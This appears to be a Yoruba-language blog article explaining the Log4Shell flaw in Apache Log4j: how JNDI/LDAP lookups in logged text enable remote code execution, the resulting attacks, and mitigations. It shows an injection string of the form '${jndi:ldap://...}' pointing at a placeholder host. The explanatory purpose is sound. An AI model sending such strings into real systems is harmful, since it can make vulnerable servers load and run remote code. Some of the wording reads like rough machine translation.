Atọka akoonu[Fipamọ][Ifihan]
Ni ipari Oṣu kọkanla ọdun 2021, a ṣe awari irokeke nla si cybersecurity. Iwa ilokulo yii yoo ni ipa lori awọn miliọnu awọn eto kọnputa ni kariaye.
Eyi jẹ itọsọna kan lori ailagbara Log4j ati bii abawọn apẹrẹ aṣemáṣe fi silẹ lori 90% ti awọn iṣẹ kọnputa agbaye ti ṣii lati kọlu.
Apache Log4j jẹ orisun-ìmọ-orisun Java IwUlO gedu ni idagbasoke nipasẹ Apache Software Foundation. Ni akọkọ ti a kọ nipasẹ Ceki Gülcü ni ọdun 2001, o jẹ apakan ti Awọn iṣẹ Logging Apache, iṣẹ akanṣe ti Apache Software Foundation.
Awọn ile-iṣẹ kakiri agbaye lo ile-ikawe Log4j lati jẹki gedu lori awọn ohun elo wọn. Ni otitọ, ile-ikawe Java jẹ ibi gbogbo, o le rii ni awọn ohun elo lati Amazon, Microsoft, Google, ati diẹ sii.
Okiki ti ile-ikawe tumọ si pe eyikeyi abawọn ti o pọju ninu koodu le jẹ ki awọn miliọnu awọn kọnputa ṣii si gige sakasaka. Ni Oṣu kọkanla ọjọ 24, ọdun 2021, a aabo awọsanma oluwadii ti n ṣiṣẹ fun Alibaba ṣe awari abawọn nla kan.
Ailagbara Log4j, ti a tun mọ ni Log4Shell, wa laisi akiyesi lati ọdun 2013. Ailagbara jẹ ki awọn oṣere irira ṣiṣẹ koodu lori awọn ọna ṣiṣe ti o kan ti nṣiṣẹ Log4j. O ti ṣafihan ni gbangba ni Oṣu kejila ọjọ 9th, ọdun 2021
Awọn amoye ile-iṣẹ pe abawọn Log4Shell naa ti o tobi palara ni to šẹšẹ iranti.
Ni ọsẹ ti o tẹle atẹjade ti ailagbara, awọn ẹgbẹ cybersecurity ṣe awari awọn miliọnu awọn ikọlu. Diẹ ninu awọn oniwadi paapaa ṣakiyesi iwọn ti o ju ọgọrun ikọlu ni iṣẹju kan.
Bawo ni o ṣiṣẹ?
Lati loye idi ti Log4Shell lewu pupọ, a nilo lati loye kini o lagbara.
Ailagbara Log4Shell gba laaye fun ipaniyan koodu lainidii, eyiti o tumọ si pe ikọlu le ṣiṣẹ eyikeyi aṣẹ tabi koodu lori ẹrọ ibi-afẹde kan.
Báwo ló ṣe ṣàṣeparí èyí?
Ni akọkọ, a nilo lati ni oye kini JNDI jẹ.
Orukọ Java ati Interface Itọsọna (JNDI) jẹ iṣẹ Java ti o fun laaye awọn eto Java lati ṣawari ati wo data ati awọn orisun nipasẹ orukọ kan. Awọn iṣẹ itọsọna wọnyi ṣe pataki nitori pe wọn pese eto igbasilẹ ti a ṣeto fun awọn olupilẹṣẹ lati tọka ni irọrun nigbati ṣiṣẹda awọn ohun elo.
JNDI le lo orisirisi awọn ilana lati wọle si itọsọna kan. Ọkan ninu awọn ilana wọnyi ni Ilana Wiwọle Itọsọna Lightweight, tabi LDAP.
Nigbati o ba wọle okun, Wọle4j ṣe awọn aropo okun nigba ti wọn ba pade awọn ikosile ti fọọmu naa ${prefix:name}
.
Fun apere, Text: ${java:version}
le wọle bi Ọrọ: Java version 1.8.0_65. Iru awọn aropo wọnyi jẹ ibi ti o wọpọ.
A tun le ni awọn ikosile bii Text: ${jndi:ldap://example.com/file}
eyiti o nlo eto JNDI lati ṣaja ohun Java kan lati URL nipasẹ ilana LDAP.
Eyi ni imunadoko awọn ẹru data ti o nbọ lati URL yẹn sinu ẹrọ naa. Eyikeyi agbonaeburuwole le gbalejo koodu irira lori URL ti gbogbo eniyan ati duro fun awọn ẹrọ lilo Log4j lati wọle.
Niwọn bi awọn akoonu ti awọn ifiranṣẹ log ni awọn data iṣakoso olumulo, awọn olosa le fi awọn itọkasi JNDI tiwọn ti o tọka si awọn olupin LDAP ti wọn ṣakoso. Awọn olupin LDAP wọnyi le kun fun awọn ohun Java irira eyiti JNDI le ṣe nipasẹ ailagbara naa.
Ohun ti o jẹ ki eyi buru si ni pe ko ṣe pataki ti ohun elo naa ba jẹ ẹgbẹ olupin tabi ohun elo ẹgbẹ alabara.
Niwọn igba ti ọna ba wa fun olutaja lati ka koodu irira ti ikọlu naa, ohun elo naa ṣi ṣi silẹ lati lo.
Tani o kan?
Ailagbara naa kan gbogbo awọn ọna ṣiṣe ati awọn iṣẹ ti o lo APache Log4j, pẹlu awọn ẹya 2.0 titi de ati pẹlu 2.14.1.
Ọpọlọpọ awọn amoye aabo ni imọran pe ailagbara naa le ni ipa lori nọmba awọn ohun elo nipa lilo Java.
Aṣiṣe naa ni a kọkọ ṣe awari ninu ere fidio Minecraft ti Microsoft. Microsoft ti rọ awọn olumulo wọn lati ṣe igbesoke ẹda Java Minecraft sọfitiwia lati ṣe idiwọ eyikeyi eewu.
Jen Easterly, Oludari ti Cybersecurity ati Aabo Aabo Amayederun (CISA) sọ pe awọn olutaja ni pataki ojuse lati ṣe idiwọ awọn olumulo ipari lati awọn oṣere irira ti o lo ailagbara yii.
"Awọn olutaja yẹ ki o tun ṣe ibaraẹnisọrọ pẹlu awọn alabara wọn lati rii daju pe awọn olumulo ipari mọ pe ọja wọn ni ailagbara yii ati pe o yẹ ki o ṣe pataki awọn imudojuiwọn sọfitiwia.”
Awọn ikọlu naa ti ni iroyin ti bẹrẹ tẹlẹ. Symantec, ile-iṣẹ kan ti o pese sọfitiwia cybersecurity, ti ṣakiyesi nọmba oriṣiriṣi ti awọn ibeere ikọlu.
Eyi ni diẹ ninu awọn apẹẹrẹ ti awọn iru ikọlu ti awọn oniwadi ti rii:
- botnets
Botnets jẹ nẹtiwọọki ti awọn kọnputa ti o wa labẹ iṣakoso ti ẹgbẹ ikọlu kan. Wọn ṣe iranlọwọ lati ṣe awọn ikọlu DDoS, ji data, ati awọn itanjẹ miiran. Awọn oniwadi ṣe akiyesi botnet Muhstik ni awọn iwe afọwọkọ ikarahun ti a ṣe igbasilẹ lati Log4j lo nilokulo.
- XMRig Miner Tirojanu
XMRig jẹ oluwakusa cryptocurrency ti ṣiṣi ti o nlo awọn CPU lati wa ami ami Monero. Cybercriminals le fi XMRig sori ẹrọ eniyan ki wọn le lo agbara ṣiṣe wọn laisi imọ wọn.
- Khonsari Ransomware
Ransomware tọka si fọọmu malware ti a ṣe si encrypt awọn faili lori kọmputa. Awọn ikọlu le lẹhinna beere isanwo ni paṣipaarọ fun fifun iwọle pada si awọn faili ti paroko. Awọn oniwadi ṣe awari Khonsari ransomware ni awọn ikọlu Log4Shell. Wọn fojusi awọn olupin Windows ati lo ilana .NET.
Kini yoo ṣẹlẹ nigbamii?
Awọn amoye ṣe asọtẹlẹ pe o le gba awọn oṣu tabi boya paapaa awọn ọdun lati ṣatunṣe ni kikun rudurudu ti o mu wa nipasẹ ailagbara Log4J.
Ilana yii jẹ mimu imudojuiwọn gbogbo eto ti o kan pẹlu ẹya patched. Paapaa ti gbogbo awọn ọna ṣiṣe wọnyi ba wa ni padi, ewu ti o nwaye ti awọn ẹhin ẹhin ti o ṣeeṣe ti awọn olosa le ti ṣafikun tẹlẹ si window ti awọn olupin ṣii fun ikọlu.
Ọpọlọpọ awọn solusan ati mitigations wa lati ṣe idiwọ awọn ohun elo lati jẹ ilokulo nipasẹ kokoro yii. Ẹya Log4j tuntun 2.15.0-rc1 yipada ọpọlọpọ awọn eto lati dinku ailagbara yii.
Gbogbo awọn ẹya ti o nlo JNDI yoo jẹ alaabo nipasẹ aiyipada ati pe awọn wiwa latọna jijin ti ni ihamọ bi daradara. Pa ẹya wiwa kuro lori iṣeto Log4j rẹ yoo ṣe iranlọwọ dinku eewu ti awọn ilokulo ti o ṣeeṣe.
Ni ita Log4j, iwulo tun wa fun ero ti o gbooro lati ṣe idiwọ awọn ilokulo orisun-ìmọ.
Sẹyìn ni May, awọn White House tu kan itọsọna alaṣẹ eyiti o ni ero lati mu ilọsiwaju cybersecurity ti orilẹ-ede. O pẹlu ipese kan fun iwe-aṣẹ ohun elo sọfitiwia (SBOM) eyiti o jẹ pataki iwe aṣẹ ti o ni atokọ ti gbogbo ohun kan ti o nilo lati kọ ohun elo naa ninu.
Eyi pẹlu awọn ẹya bii awọn orisun orisun awọn akojọpọ, awọn igbẹkẹle, ati awọn API ti a lo fun idagbasoke. Botilẹjẹpe ero ti SBOM ṣe iranlọwọ fun akoyawo, ṣe yoo ṣe iranlọwọ fun alabara gaan bi?
Awọn igbẹkẹle igbegasoke le jẹ wahala pupọ ju. Awọn ile-iṣẹ le yan lati san eyikeyi awọn itanran kuku ju eewu jafara akoko afikun wiwa awọn idii omiiran. Boya awọn SBOM wọnyi yoo wulo nikan ti wọn ba dopin ti wa ni opin siwaju sii.
ipari
Ọrọ Log4j jẹ diẹ sii ju iṣoro imọ-ẹrọ nikan fun awọn ẹgbẹ.
Awọn oludari iṣowo gbọdọ mọ awọn eewu ti o pọju ti o le waye nigbati awọn olupin wọn, awọn ọja, tabi awọn iṣẹ gbarale koodu ti awọn funrararẹ ko ṣetọju.
Gbẹkẹle orisun-ìmọ ati awọn ohun elo ẹnikẹta nigbagbogbo wa pẹlu iye diẹ ninu eewu. Awọn ile-iṣẹ yẹ ki o ronu ṣiṣẹ awọn ilana idinku eewu ṣaaju ki awọn irokeke tuntun wa si imọlẹ.
Pupọ ti oju opo wẹẹbu gbarale sọfitiwia orisun ṣiṣi ti a ṣetọju nipasẹ ẹgbẹẹgbẹrun awọn oluyọọda agbaye.
Ti a ba fẹ lati jẹ ki oju opo wẹẹbu jẹ aaye ailewu, awọn ijọba ati awọn ile-iṣẹ yẹ ki o ṣe idoko-owo ni igbeowosile awọn akitiyan orisun ṣiṣi ati awọn ile-iṣẹ cybersecurity gẹgẹbi CISA.
Fi a Reply